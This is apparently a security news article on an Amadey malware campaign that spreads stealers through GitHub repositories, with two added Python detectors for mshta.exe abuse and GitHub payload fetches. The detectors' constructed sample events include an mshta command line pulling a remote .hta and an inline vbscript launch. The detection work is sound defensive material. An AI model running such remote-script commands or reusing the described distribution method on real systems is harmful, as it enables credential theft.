A stealthy attack campaign targeting Windows users is under way, using the Amadey malware as a staging point to install further data-stealing malware. The attackers have abused public GitHub repositories as a payload distribution point, thereby bypassing most traditional web filters. The incident is another warning that legitimate platforms can be turned into malware distribution channels.


The campaign begins with a malicious downloader called Emmenhtal, also known as PEAKLIGHT. It is written in AutoIt, a language commonly used for automation tools, which lets it masquerade easily as harmless software. Emmenhtal is packaged with a custom DLL that performs covert functions, including process monitoring, hiding network activity, and slowing down technical analysis. Once executed, Emmenhtal connects to a remote server, downloads the Amadey malware, and launches it via the Windows utility mshta.exe. This is a technique commonly used by attack groups to evade security software: it abuses legitimate components already present in the operating system rather than directly invoking obviously unusual behavior.
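The mshta.exe step above is a living-off-the-land pattern, and the defender's counter is process-creation telemetry: a signed Windows binary is not suspicious by itself, but where it is launched from and what it is asked to run are. The following is an added example, not code from the article or from any vendor mentioned in it. It assumes Sysmon-style process-creation records with parent image, image and command line, and it runs over constructed events whose paths, file names and URL are placeholders.

```python
"""Flag mshta.exe launches that match the living-off-the-land pattern described above.

Added example, not from the article. The events below are constructed Sysmon-style
process-creation records; every path, file name and URL is a placeholder.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from ntpath import basename


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the newly created process
    command_line: str   # command line of the newly created process


# mshta pulling its script from a remote location (http(s) URL or a UNC share)
REMOTE_SOURCE = re.compile(r"(https?://|\\\\[^\\\s]+\\)", re.IGNORECASE)
# script passed inline on the command line instead of a local .hta file
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript|about):", re.IGNORECASE)
# parent running from a user-writable location, where a dropped loader typically lives
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.IGNORECASE)


def mshta_findings(event: ProcEvent) -> list[str]:
    """Return the reasons an event looks suspicious; an empty list means not flagged.

    Non-mshta events are ignored entirely so the check can run over a full event stream.
    """
    if basename(event.image).lower() != "mshta.exe":
        return []
    reasons: list[str] = []
    if REMOTE_SOURCE.search(event.command_line):
        reasons.append("remote script source")
    if INLINE_SCRIPT.search(event.command_line):
        reasons.append("inline script protocol")
    if USER_WRITABLE.search(event.parent_image):
        reasons.append("parent runs from user-writable path")
    return reasons


def flag_events(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return only the events that produced at least one finding, with their reasons."""
    flagged = []
    for event in events:
        reasons = mshta_findings(event)
        if reasons:
            flagged.append((event, reasons))
    return flagged


# Constructed sample events (placeholders, not observed data).
SAMPLE_EVENTS = [
    # a loader dropped in %TEMP% launching mshta against a remote script: the chain in the article
    ProcEvent(
        parent_image=r"C:\Users\alice\AppData\Local\Temp\setup_tool.exe",
        image=r"C:\Windows\System32\mshta.exe",
        command_line=r"mshta.exe https://example.invalid/stage2.hta",
    ),
    # a shell launching mshta with an inline script protocol (harmless payload here)
    ProcEvent(
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\mshta.exe",
        command_line='mshta.exe vbscript:msgbox("test")',
    ),
    # benign: an installed application opening its own local HTA help page
    ProcEvent(
        parent_image=r"C:\Program Files\ExampleVendor\app.exe",
        image=r"C:\Windows\System32\mshta.exe",
        command_line=r'mshta.exe "C:\Program Files\ExampleVendor\help.hta"',
    ),
    # unrelated process, ignored by the check
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\notepad.exe",
        command_line="notepad.exe",
    ),
]


if __name__ == "__main__":
    for event, reasons in flag_events(SAMPLE_EVENTS):
        print(f"{event.command_line!r}: {', '.join(reasons)}")
```

The benign third event is the reason the check looks at parent path and script source rather than alerting on every mshta.exe launch: a locally installed application opening its own .hta file is normal, while a parent in a temp directory handing mshta a remote URL is the combination the article describes.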

Amadey acts as a specialized middleware platform, effectively a miniature operating system dedicated to malicious code. Once deployed on a system, Amadey does not carry out complex attack behavior on its own; instead it loads and manages custom plugins. Each plugin performs a specific task, such as stealing login credentials from browsers, extracting data from email clients, accessing FTP and VPN applications, or capturing the user's screen in real time. In this campaign, Amadey was configured to connect to public GitHub repositories to download additional malicious components. Rather than using a traditional, easily identifiable C2 infrastructure, the attackers used GitHub as a malware distribution server, which lets them bypass most network content-filtering policies because of the platform's reputation and its routine, trusted use in corporate environments.

The campaign uses three public GitHub accounts, Legendary99909, DFfe9ewf and Milidmdds, to store and distribute malicious code. These repositories contain a variety of .exe executables, .dll libraries, and PowerShell scripts, which serve either as Amadey plugins or as standalone payloads. Notably, many of these files are stealers already well established on the black market, such as Lumma Stealer, RedLine Stealer and Rhadamanthys. All of these are malicious programs designed specifically to steal browser data, login cookies, cryptocurrency data, and other sensitive user information. Integrating such capable stealing tools greatly expands the scope of exploitation and the value of each compromised machine.

A subtle point in the campaign was the use of .txt text files on GitHub as rudimentary remote control panels. Each file contains a list of URLs pointing to the actual payloads, allowing the attacker to update the download sequence without modifying the Amadey code installed on the victim's machine. This approach gives the attackers flexibility in coordinating the campaign while masking its real purpose behind a plain text format. This camouflage makes the malicious behavior harder to detect, while the latency between issuing commands and distributing malicious code is kept to a minimum.
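Because the .txt index and the payloads it points to live on the same trusted platform, blocking the host is not an option; what a defender can do is correlate the sequence in proxy logs: one client fetching a .txt from GitHub-hosted content and, shortly afterwards, fetching executable-type files from the same hosts. The following is an added example, not code from the article. It assumes a simple space-separated proxy log format (timestamp, client, method, URL, status, bytes, quoted user agent) and runs over constructed log lines; the client addresses, repository path and file names are placeholders.

```python
"""Correlate proxy-log entries: a GitHub-hosted .txt index fetch followed by payload downloads.

Added example, not from the article. The log format is assumed, and the log lines,
client addresses, repository path and file names below are constructed placeholders.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample log: timestamp, client, method, URL, status, bytes, "user-agent".
SAMPLE_PROXY_LOG = """\
2025-07-17T09:00:01Z 10.0.0.5 GET https://raw.githubusercontent.com/example-user/example-repo/main/list.txt 200 412 "-"
2025-07-17T09:00:09Z 10.0.0.5 GET https://raw.githubusercontent.com/example-user/example-repo/main/upd.exe 200 1843200 "-"
2025-07-17T09:00:11Z 10.0.0.5 GET https://raw.githubusercontent.com/example-user/example-repo/main/clip.dll 200 98304 "-"
2025-07-17T09:15:30Z 10.0.0.9 GET https://raw.githubusercontent.com/example-user/example-repo/main/README.txt 200 2048 "Mozilla/5.0"
2025-07-17T10:02:00Z 10.0.0.9 GET https://github.com/example-user/example-repo/archive/refs/heads/main.zip 200 50000 "Mozilla/5.0"
this line is deliberately malformed and must be skipped
"""

LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) "([^"]*)"$')
GITHUB_HOSTS = {"raw.githubusercontent.com", "github.com", "objects.githubusercontent.com"}
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".hta", ".zip")
WINDOW = timedelta(minutes=10)  # how soon after the index fetch a payload fetch counts


def parse_log(text: str) -> list[dict]:
    """Parse log lines into records; malformed lines are skipped rather than aborting the run."""
    records = []
    for line in text.splitlines():
        match = LINE.match(line)
        if not match:
            continue
        ts, client, _method, url, status, _size, user_agent = match.groups()
        parsed = urlparse(url)
        records.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client,
            "url": url,
            "host": (parsed.hostname or "").lower(),
            "path": parsed.path.lower(),
            "status": int(status),
            "user_agent": user_agent,
        })
    return records


def correlate(text: str) -> list[dict]:
    """Return one alert per (client, .txt index fetch) that is followed within WINDOW
    by at least one executable-type download from a GitHub host."""
    by_client: dict[str, list[dict]] = defaultdict(list)
    for rec in parse_log(text):
        if rec["status"] == 200 and rec["host"] in GITHUB_HOSTS:
            by_client[rec["client"]].append(rec)

    alerts = []
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        for i, index_fetch in enumerate(recs):
            if not index_fetch["path"].endswith(".txt"):
                continue
            payloads = [
                r["url"] for r in recs[i + 1:]
                if r["ts"] - index_fetch["ts"] <= WINDOW and r["path"].endswith(PAYLOAD_EXT)
            ]
            if payloads:
                alerts.append({
                    "client": client,
                    "index": index_fetch["url"],
                    "payloads": payloads,
                    # an empty or non-browser user agent on the index fetch strengthens the case
                    "user_agent": index_fetch["user_agent"],
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_PROXY_LOG):
        print(alert["client"], alert["index"], "->", ", ".join(alert["payloads"]))
```

The second client in the sample reads a README.txt and, much later, downloads a repository archive through a browser; the time window keeps that ordinary developer activity out of the alert, while the first client's index fetch with an empty user agent followed within seconds by an .exe and a .dll is exactly the sequence the article describes.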

The campaign shows how dangerous it is when malicious code is distributed through legitimate platforms such as GitHub, which are generally trusted by default. Hiding payloads in public repositories makes it easier for attackers to get past traditional layers of defense. This is a strong reminder that users and organizations alike should be wary of any download, even from a seemingly trustworthy source.

The Hacker News